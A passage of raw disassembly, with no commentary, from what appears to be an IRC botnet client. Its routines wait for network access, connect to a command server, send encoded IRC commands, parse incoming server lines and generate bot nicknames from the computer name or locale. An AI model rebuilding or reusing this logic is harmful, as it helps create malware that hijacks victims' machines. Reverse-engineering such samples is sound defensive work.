retn 4
sub_40FEC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF47 proc near ; CODE XREF: sub_419B2F+1FE�p
; sub_419B2F+397�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4220C0
push ebx
mov ebx, [ebp+arg_0]
cmp byte ptr [ebx+4], 0
jnz short loc_40FF63
xor eax, eax
inc eax
jmp short loc_40FFB1
; ---------------------------------------------------------------------------
loc_40FF63: ; CODE XREF: sub_40FF47+15�j
push esi
lea eax, [ebp+arg_8]
push edi
push eax
push [ebp+arg_4]
lea eax, [ebp+var_1000]
xor edi, edi
push 1000h
push eax
call sub_423640
add esp, 10h
mov esi, offset dword_454510
loc_40FF87: ; CODE XREF: sub_40FF47+64�j
cmp byte ptr [esi], 0
jz short loc_40FF9F
lea eax, [ebp+var_1000]
push eax
push esi
push ebx
call sub_410491
add esp, 0Ch
add edi, eax
loc_40FF9F: ; CODE XREF: sub_40FF47+43�j
add esi, 0BFh
cmp esi, offset byte_45474D
jl short loc_40FF87
mov eax, edi
pop edi
pop esi
loc_40FFB1: ; CODE XREF: sub_40FF47+1A�j
pop ebx
leave
retn
sub_40FF47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FFB4 proc near ; CODE XREF: sub_412267+50C�p
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_40FFCC
xor eax, eax
inc eax
jmp loc_410124
; ---------------------------------------------------------------------------
loc_40FFCC: ; CODE XREF: sub_40FFB4+E�j
cmp dword_4543FC, 0
jnz short loc_40FFF2
loc_40FFD5: ; CODE XREF: sub_40FFB4+3C�j
lea eax, [ebp+var_4]
push 0
push eax
call dword_454238 ; InternetGetConnectedState
test eax, eax
jnz short loc_40FFF2
push 7530h
call dword_42F15C ; Sleep
jmp short loc_40FFD5
; ---------------------------------------------------------------------------
loc_40FFF2: ; CODE XREF: sub_40FFB4+1F�j
; sub_40FFB4+2F�j
xor ebx, ebx
push 6
inc ebx
push ebx
push 2
call dword_454394 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_410055
push [ebp+arg_0]
call dword_454398 ; gethostbyname
test eax, eax
jz short loc_41004D
mov eax, [eax+0Ch]
push 4
push dword ptr [eax]
lea eax, [ebp+var_10]
push eax
call sub_4223F0
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call dword_454314 ; ntohs
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
call dword_4542AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41005C
loc_41004D: ; CODE XREF: sub_40FFB4+5E�j
push dword ptr [esi]
call dword_4543AC ; closesocket
loc_410055: ; CODE XREF: sub_40FFB4+51�j
mov eax, ebx
jmp loc_410124
; ---------------------------------------------------------------------------
loc_41005C: ; CODE XREF: sub_40FFB4+97�j
; DATA XREF: .text:off_436B7C�o
push edi
mov edi, dword_42F164
call edi ; dword_42F164
mov ecx, esi
mov dword_45450C, eax
call sub_40FDC0
call edi ; dword_42F164
mov dword_4555F8, eax
call edi ; dword_42F164
push [ebp+arg_8]
mov dword_45450C, eax
mov [esi+4], bl
call sub_422120
inc eax
push eax
call sub_423F55
mov ebx, dword_42F04C
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+arg_8]
push eax
call ebx ; dword_42F04C
push [ebp+arg_C]
call sub_422120
inc eax
push eax
call sub_423F55
pop ecx
mov [esi+0Ch], eax
pop ecx
push [ebp+arg_10]
push eax
call ebx ; dword_42F04C
cmp [ebp+arg_14], 0
mov ebx, offset aSS ; "%s %s\r\n"
jz short loc_4100EE
push offset byte_44D6A4
push [ebp+arg_14]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_4100EE
push [ebp+arg_14]
push offset aZ ; "=Z\\"
push ebx
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 14h
loc_4100EE: ; CODE XREF: sub_40FFB4+111�j
; sub_40FFB4+124�j
push [ebp+arg_8]
push offset dword_43C088
push ebx
push dword ptr [esi]
push esi
call sub_40FBDB
push [ebp+arg_10]
push [ebp+arg_C]
push offset a8hj ; "8HJ"
push offset aSS0S ; "%s %s * 0 :%s\r\n"
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 2Ch
call edi ; dword_42F164
mov dword_45450C, eax
xor eax, eax
pop edi
loc_410124: ; CODE XREF: sub_40FFB4+13�j
; sub_40FFB4+A3�j
pop esi
pop ebx
leave
retn 18h
sub_40FFB4 endp
; =============== S U B R O U T I N E =======================================
sub_41012A proc near ; CODE XREF: sub_403B2C+871�p
; sub_40CDE2+643�p ...
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_41015A
push offset aLeaving__ ; "leaving.."
push esi
call sub_41015C
pop ecx
and byte ptr [esi+4], 0
and byte ptr [esi+5], 0
pop ecx
push 2
push dword ptr [esi]
call dword_4543A8 ; shutdown
push dword ptr [esi]
call dword_4543AC ; closesocket
loc_41015A: ; CODE XREF: sub_41012A+7�j
pop esi
retn
sub_41012A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41015C proc near ; CODE XREF: sub_403B2C+85B�p
; sub_40CDE2+62D�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4220C0
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_4101CD
cmp [ebp+arg_4], 0
jz short loc_4101AF
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_1000]
push [ebp+arg_4]
push 1000h
push eax
call sub_423640
lea eax, [ebp+var_1000]
push eax
push offset dword_43C0A8
push offset aSS ; "%s %s\r\n"
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 24h
jmp short loc_4101C4
; ---------------------------------------------------------------------------
loc_4101AF: ; CODE XREF: sub_41015C+1B�j
push offset dword_43C0A8
push offset aS_4 ; "%s\r\n"
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 10h
loc_4101C4: ; CODE XREF: sub_41015C+51�j
test eax, eax
jz short loc_4101CD
xor eax, eax
inc eax
jmp short loc_4101CF
; ---------------------------------------------------------------------------
loc_4101CD: ; CODE XREF: sub_41015C+15�j
; sub_41015C+6A�j
xor eax, eax
loc_4101CF: ; CODE XREF: sub_41015C+6F�j
pop esi
leave
retn
sub_41015C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4101D2 proc near ; CODE XREF: sub_412267+513�p
var_400 = byte ptr -400h
push ebp
mov ebp, esp
sub esp, 400h
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_41022E
push edi
loc_4101E5: ; CODE XREF: sub_4101D2+55�j
push 0
lea eax, [ebp+var_400]
push 3FFh
push eax
push dword ptr [esi]
call dword_454330 ; recv
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_410229
test edi, edi
jz short loc_410229
call dword_42F164 ; GetTickCount
and [ebp+edi+var_400], 0
mov dword_45450C, eax
lea eax, [ebp+var_400]
mov ecx, esi
push eax
call sub_410234
jmp short loc_4101E5
; ---------------------------------------------------------------------------
loc_410229: ; CODE XREF: sub_4101D2+2E�j
; sub_4101D2+32�j
and byte ptr [esi+4], 0
pop edi
loc_41022E: ; CODE XREF: sub_4101D2+10�j
xor eax, eax
pop esi
inc eax
leave
retn
sub_4101D2 endp
; =============== S U B R O U T I N E =======================================
sub_410234 proc near ; CODE XREF: sub_4101D2+50�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
mov ebp, ecx
mov ebx, offset asc_438858 ; "\r\n"
jmp short loc_410253
; ---------------------------------------------------------------------------
loc_410245: ; CODE XREF: sub_410234+2C�j
and byte ptr [esi], 0
push edi
mov ecx, ebp
call sub_410269
lea edi, [esi+2]
loc_410253: ; CODE XREF: sub_410234+F�j
push ebx
push edi
call sub_4235C0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_410245
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_410234 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410269 proc near ; CODE XREF: sub_410234+17�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
cmp byte ptr [eax], 3Ah
push edi
mov [ebp+var_4], ecx
mov [ebp+var_8], ebx
push 20h
jnz loc_4103F5
lea edi, [eax+1]
push edi
call sub_4233B0
pop ecx
cmp eax, ebx
pop ecx
jz loc_410453
mov [eax], bl
inc eax
push 20h
push eax
mov [ebp+arg_0], eax
call sub_4233B0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4102B4
mov [esi], bl
inc esi
loc_4102B4: ; CODE XREF: sub_410269+46�j
push 21h
push edi
mov [ebp+var_14], edi
call sub_4233B0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_10], eax
jz short loc_4102E5
mov [eax], bl
inc [ebp+var_10]
push 40h
push [ebp+var_10]
call sub_4233B0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
jz short loc_4102E5
mov [eax], bl
inc [ebp+var_C]
loc_4102E5: ; CODE XREF: sub_410269+5D�j
; sub_410269+75�j
mov edi, [ebp+arg_0]
push offset aTf ; "'TF"
push edi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_410445
push offset aZ_0 ; "=Z]"
push edi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41033D
loc_41030E: ; CODE XREF: sub_410269+E3�j
push [ebp+var_C]
mov ecx, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_14]
call sub_40FE51
test eax, eax
jz loc_410445
push [ebp+var_C]
mov ecx, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_14]
call sub_40FD55
jmp loc_410445
; ---------------------------------------------------------------------------
loc_41033D: ; CODE XREF: sub_410269+A3�j
push offset dword_43C0A8
push edi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41030E
push offset dword_43C080
push edi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41037A
push 20h
push esi
mov [ebp+var_8], esi
call sub_4233B0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_410374
loc_410372: ; CODE XREF: sub_410269+139�j
mov [esi], bl
loc_410374: ; CODE XREF: sub_410269+107�j
inc esi
jmp loc_410445
; ---------------------------------------------------------------------------
loc_41037A: ; CODE XREF: sub_410269+F4�j
push offset dword_43C078
push edi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_4103A4
push 20h
push esi
mov [ebp+var_8], esi
call sub_4233B0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_410453
jmp short loc_410372
; ---------------------------------------------------------------------------
loc_4103A4: ; CODE XREF: sub_410269+120�j
push offset dword_43C088
push edi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_410445
mov eax, [ebp+var_4]
push dword ptr [eax+8]
push [ebp+var_14]
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_410445
mov ebx, [ebp+var_4]
push dword ptr [ebx+8]
call sub_421C78
push esi
call sub_422120
inc eax
push eax
call sub_423F55
add esp, 0Ch
mov [ebx+8], eax
push esi
push eax
call dword_42F04C ; lstrcpyA
jmp short loc_410445
; ---------------------------------------------------------------------------
loc_4103F5: ; CODE XREF: sub_410269+19�j
push eax
mov edi, eax
call sub_4233B0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_410453
push offset aRa ; "=RA"
push edi
mov [eax], bl
lea esi, [eax+1]
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_410439
cmp esi, ebx
jz short loc_410453
mov eax, [ebp+var_4]
inc esi
push esi
push offset aTa ; "=TA"
push offset aSS ; "%s %s\r\n"
push dword ptr [eax]
push eax
call sub_40FBDB
add esp, 14h
jmp short loc_410453
; ---------------------------------------------------------------------------
loc_410439: ; CODE XREF: sub_410269+1AE�j
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
mov [ebp+var_14], ebx
mov [ebp+var_8], ebx
loc_410445: ; CODE XREF: sub_410269+8E�j
; sub_410269+B8�j ...
mov ecx, [ebp+var_4]
lea eax, [ebp+var_14]
push eax
push esi
push edi
call sub_41045A
loc_410453: ; CODE XREF: sub_410269+2C�j
; sub_410269+133�j ...
pop edi
pop esi
pop ebx
leave
retn 4
sub_410269 endp
; =============== S U B R O U T I N E =======================================
sub_41045A proc near ; CODE XREF: sub_410269+1E5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, ecx
mov esi, [edi+28h]
jmp short loc_410477
; ---------------------------------------------------------------------------
loc_410463: ; CODE XREF: sub_41045A+1F�j
push [esp+8+arg_0]
push dword ptr [esi]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41047D
mov esi, [esi+8]
loc_410477: ; CODE XREF: sub_41045A+7�j
test esi, esi
jnz short loc_410463
jmp short loc_41048C
; ---------------------------------------------------------------------------
loc_41047D: ; CODE XREF: sub_41045A+18�j
push edi
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
call dword ptr [esi+4]
add esp, 0Ch
loc_41048C: ; CODE XREF: sub_41045A+21�j
pop edi
pop esi
retn 0Ch
sub_41045A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410491 proc near ; CODE XREF: start:loc_4010DD�p
; sub_401408:loc_401449�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4220C0
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_4104AD
xor eax, eax
inc eax
jmp short loc_4104F3
; ---------------------------------------------------------------------------
loc_4104AD: ; CODE XREF: sub_410491+15�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_1000]
push [ebp+arg_8]
push 1000h
push eax
call sub_423640
lea eax, [ebp+var_1000]
push eax
push [ebp+arg_4]
push offset dword_43C080
push offset aSSS ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 28h
mov esi, eax
push 1F4h
call dword_42F15C ; Sleep
mov eax, esi
loc_4104F3: ; CODE XREF: sub_410491+1A�j
pop esi
leave
retn
sub_410491 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104F6 proc near ; CODE XREF: start:loc_4010D6�p
; sub_401408+37�p ...
var_FE8 = byte ptr -0FE8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 0FE8h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41050E
xor eax, eax
inc eax
jmp short loc_410554
; ---------------------------------------------------------------------------
loc_41050E: ; CODE XREF: sub_4104F6+11�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_FE8]
push [ebp+arg_8]
push 0FE6h
push eax
call sub_423640
lea eax, [ebp+var_FE8]
push eax
push [ebp+arg_4]
push offset dword_43C078
push offset aSSS_0 ; "%s %s : %s\r\n"
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 28h
mov esi, eax
push 1F4h
call dword_42F15C ; Sleep
mov eax, esi
loc_410554: ; CODE XREF: sub_4104F6+16�j
pop esi
leave
retn
sub_4104F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410557 proc near ; CODE XREF: sub_403B2C+2228�p
var_FE8 = byte ptr -0FE8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 0FE8h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41056F
xor eax, eax
inc eax
jmp short loc_4105B5
; ---------------------------------------------------------------------------
loc_41056F: ; CODE XREF: sub_410557+11�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_FE8]
push [ebp+arg_8]
push 0FE6h
push eax
call sub_423640
lea eax, [ebp+var_FE8]
push eax
push [ebp+arg_4]
push offset dword_43C078
push offset dword_438878
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 28h
mov esi, eax
push 1F4h
call dword_42F15C ; Sleep
mov eax, esi
loc_4105B5: ; CODE XREF: sub_410557+16�j
pop esi
leave
retn
sub_410557 endp
; =============== S U B R O U T I N E =======================================
sub_4105B8 proc near ; CODE XREF: sub_403B2C+1B15�p
; sub_403B2C+1D62�p ...
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_4105C3
xor eax, eax
inc eax
jmp short locret_4105DC
; ---------------------------------------------------------------------------
loc_4105C3: ; CODE XREF: sub_4105B8+4�j
push [esp+arg_0]
push offset dword_43C0B0
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_40FBDB
add esp, 14h
locret_4105DC: ; CODE XREF: sub_4105B8+9�j
retn 4
sub_4105B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105DF proc near ; CODE XREF: sub_416208+438�p
; sub_416208+59F�p ...
var_FE8 = byte ptr -0FE8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 0FE8h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_410636
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+var_FE8]
push [ebp+arg_C]
push 0FE6h
push eax
call sub_423640
add esp, 10h
cmp [ebp+arg_8], 0
jz short loc_41063B
lea eax, [ebp+var_FE8]
push eax
call sub_4240A0
pop ecx
push eax
push [ebp+arg_8]
call sub_4240A0
pop ecx
push eax
call sub_41F2BB
pop ecx
test eax, eax
pop ecx
jnz short loc_41063B
loc_410636: ; CODE XREF: sub_4105DF+11�j
xor eax, eax
inc eax
jmp short loc_410669
; ---------------------------------------------------------------------------
loc_41063B: ; CODE XREF: sub_4105DF+32�j
; sub_4105DF+55�j
lea eax, [ebp+var_FE8]
push eax
push [ebp+arg_4]
push offset dword_43C078
push offset aSSS_0 ; "%s %s : %s\r\n"
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 18h
mov esi, eax
push 1F4h
call dword_42F15C ; Sleep
mov eax, esi
loc_410669: ; CODE XREF: sub_4105DF+5A�j
pop esi
leave
retn
sub_4105DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41066C proc near ; CODE XREF: sub_416208:loc_416647�p
; sub_416208:loc_4167AE�p ...
var_FE8 = byte ptr -0FE8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 0FE8h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_4106C3
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+var_FE8]
push [ebp+arg_C]
push 0FE6h
push eax
call sub_423640
add esp, 10h
cmp [ebp+arg_8], 0
jz short loc_4106C8
lea eax, [ebp+var_FE8]
push eax
call sub_4240A0
pop ecx
push eax
push [ebp+arg_8]
call sub_4240A0
pop ecx
push eax
call sub_41F2BB
pop ecx
test eax, eax
pop ecx
jnz short loc_4106C8
loc_4106C3: ; CODE XREF: sub_41066C+11�j
xor eax, eax
inc eax
jmp short loc_4106F6
; ---------------------------------------------------------------------------
loc_4106C8: ; CODE XREF: sub_41066C+32�j
; sub_41066C+55�j
lea eax, [ebp+var_FE8]
push eax
push [ebp+arg_4]
push offset dword_43C080
push offset aSSS_0 ; "%s %s : %s\r\n"
push dword ptr [esi]
push esi
call sub_40FBDB
add esp, 18h
mov esi, eax
push 1F4h
call dword_42F15C ; Sleep
mov eax, esi
loc_4106F6: ; CODE XREF: sub_41066C+5A�j
pop esi
leave
retn
sub_41066C endp
; =============== S U B R O U T I N E =======================================
sub_4106F9 proc near ; CODE XREF: sub_419EE6+63�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_410704
xor eax, eax
inc eax
jmp short locret_41071D
; ---------------------------------------------------------------------------
loc_410704: ; CODE XREF: sub_4106F9+4�j
push [esp+arg_0]
push offset aTf ; "'TF"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_40FBDB
add esp, 14h
locret_41071D: ; CODE XREF: sub_4106F9+9�j
retn 4
sub_4106F9 endp
; =============== S U B R O U T I N E =======================================
sub_410720 proc near ; CODE XREF: sub_403B2C+1B44�p
; sub_40C847+EC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp byte ptr [ecx+4], 0
jnz short loc_41072B
xor eax, eax
inc eax
jmp short locret_410748
; ---------------------------------------------------------------------------
loc_41072B: ; CODE XREF: sub_410720+4�j
push [esp+arg_4]
push [esp+4+arg_0]
push offset aTf ; "'TF"
push offset dword_438890
push dword ptr [ecx]
push ecx
call sub_40FBDB
add esp, 18h
locret_410748: ; CODE XREF: sub_410720+9�j
retn 8
sub_410720 endp
; =============== S U B R O U T I N E =======================================
sub_41074B proc near ; CODE XREF: sub_403B2C+1B66�p
; sub_40C847+DF�p ...
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_410756
xor eax, eax
inc eax
jmp short locret_41076F
; ---------------------------------------------------------------------------
loc_410756: ; CODE XREF: sub_41074B+4�j
push [esp+arg_0]
push offset aZ_0 ; "=Z]"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_40FBDB
add esp, 14h
locret_41076F: ; CODE XREF: sub_41074B+9�j
retn 4
sub_41074B endp
; =============== S U B R O U T I N E =======================================
sub_410772 proc near ; CODE XREF: sub_403B2C+1C02�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp byte ptr [eax+4], 0
jnz short loc_410780
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_410780: ; CODE XREF: sub_410772+8�j
push [esp+arg_4]
push offset aS_4 ; "%s\r\n"
push dword ptr [eax]
push eax
call sub_40FBDB
add esp, 10h
retn
sub_410772 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410795 proc near ; CODE XREF: sub_4107E8+14�p
; sub_41A15F+42�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp byte ptr [ecx+4], 0
jnz short loc_4107A3
xor eax, eax
inc eax
jmp short loc_4107E4
; ---------------------------------------------------------------------------
loc_4107A3: ; CODE XREF: sub_410795+7�j
cmp [ebp+arg_8], 0
jnz short loc_4107C6
push [ebp+arg_4]
push [ebp+arg_0]
push offset dword_43C0A0
push offset dword_438890
push dword ptr [ecx]
push ecx
call sub_40FBDB
add esp, 18h
jmp short loc_4107E4
; ---------------------------------------------------------------------------
loc_4107C6: ; CODE XREF: sub_410795+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push offset dword_43C0A0
push offset dword_43889C
push dword ptr [ecx]
push ecx
call sub_40FBDB
add esp, 1Ch
loc_4107E4: ; CODE XREF: sub_410795+C�j
; sub_410795+2F�j
pop ebp
retn 0Ch
sub_410795 endp
; =============== S U B R O U T I N E =======================================
sub_4107E8 proc near ; CODE XREF: sub_41A0E6+5D�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_4107F3
xor eax, eax
inc eax
jmp short locret_410803
; ---------------------------------------------------------------------------
loc_4107F3: ; CODE XREF: sub_4107E8+4�j
push 0
push [esp+4+arg_0]
push dword ptr [ecx+8]
call sub_410795
xor eax, eax
locret_410803: ; CODE XREF: sub_4107E8+9�j
retn 4
sub_4107E8 endp
; =============== S U B R O U T I N E =======================================
sub_410806 proc near ; CODE XREF: sub_403B2C+18E3�p
; sub_412267+4DF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov [ecx+2Ch], eax
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_41081C
call sub_41099D
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_41081C: ; CODE XREF: sub_410806+D�j
cmp eax, 1
jnz short loc_410828
call sub_410AB7
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_410828: ; CODE XREF: sub_410806+19�j
cmp eax, 3
jnz short loc_410834
call sub_410930
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_410834: ; CODE XREF: sub_410806+25�j
cmp eax, 4
jnz short loc_410840
call sub_4108C7
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_410840: ; CODE XREF: sub_410806+31�j
cmp eax, 2
jz short loc_410875
cmp eax, 5
jnz short loc_410851
call sub_410BF1
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_410851: ; CODE XREF: sub_410806+42�j
cmp eax, 6
jnz short loc_41085D
call sub_410CB4
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_41085D: ; CODE XREF: sub_410806+4E�j
cmp eax, 7
jnz short loc_410869
call sub_410DDF
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_410869: ; CODE XREF: sub_410806+5A�j
cmp eax, 8
jnz short loc_410875
call sub_410F23
jmp short loc_41087A
; ---------------------------------------------------------------------------
loc_410875: ; CODE XREF: sub_410806+3D�j
; sub_410806+66�j
call sub_410882
loc_41087A: ; CODE XREF: sub_410806+14�j
; sub_410806+20�j ...
mov dword_4544A8, eax
retn 8
sub_410806 endp
; =============== S U B R O U T I N E =======================================
sub_410882 proc near ; CODE XREF: sub_410806:loc_410875�p
push ebx
push esi
push edi
push 10h
mov ebx, offset byte_4544CC
push 0
push ebx
mov edi, ecx
call sub_4221F0
xor esi, esi
add esp, 0Ch
cmp [edi+2Ch], esi
jl short loc_4108BA
loc_4108A0: ; CODE XREF: sub_410882+36�j
call sub_4220FC
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov byte_4544CC[esi], dl
inc esi
cmp esi, [edi+2Ch]
jle short loc_4108A0
loc_4108BA: ; CODE XREF: sub_410882+1C�j
and byte_4544CC[esi], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_410882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108C7 proc near ; CODE XREF: sub_410806+33�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push 10h
mov esi, offset byte_4544AC
push ebx
push esi
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
push esi
call dword_454354 ; GetComputerNameA
movsx eax, byte_4544AC
push 41h
pop ecx
loc_4108FC: ; CODE XREF: sub_4108C7+40�j
cmp eax, ecx
jnz short loc_410903
xor ebx, ebx
inc ebx
loc_410903: ; CODE XREF: sub_4108C7+37�j
inc ecx
cmp ecx, 5Bh
jl short loc_4108FC
push 61h
pop ecx
loc_41090C: ; CODE XREF: sub_4108C7+50�j
cmp eax, ecx
jnz short loc_410913
xor ebx, ebx
inc ebx
loc_410913: ; CODE XREF: sub_4108C7+47�j
inc ecx
cmp ecx, 7Bh
jl short loc_41090C
test ebx, ebx
jnz short loc_41092A
push offset aError ; "Error"
push esi
call sub_422063
pop ecx
pop ecx
loc_41092A: ; CODE XREF: sub_4108C7+54�j
mov eax, esi
pop esi
pop ebx
leave
retn
sub_4108C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410930 proc near ; CODE XREF: sub_410806+27�p
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push 10h
mov esi, offset byte_454478
push 0
push esi
mov ebx, ecx
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_10]
push 10h
push eax
push 7
push 800h
call dword_42F080 ; GetLocaleInfoA
lea eax, [ebp+var_10]
push eax
push offset aS_2 ; "%s|"
push esi
call sub_422063
push esi
call sub_422120
add esp, 10h
mov edi, eax
jmp short loc_410991
; ---------------------------------------------------------------------------
loc_41097C: ; CODE XREF: sub_410930+64�j
call sub_4220FC
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_454478[edi], dl
inc edi
loc_410991: ; CODE XREF: sub_410930+4A�j
cmp edi, [ebx+2Ch]
jle short loc_41097C
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_410930 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41099D proc near ; CODE XREF: sub_410806+F�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
mov ebp, esp
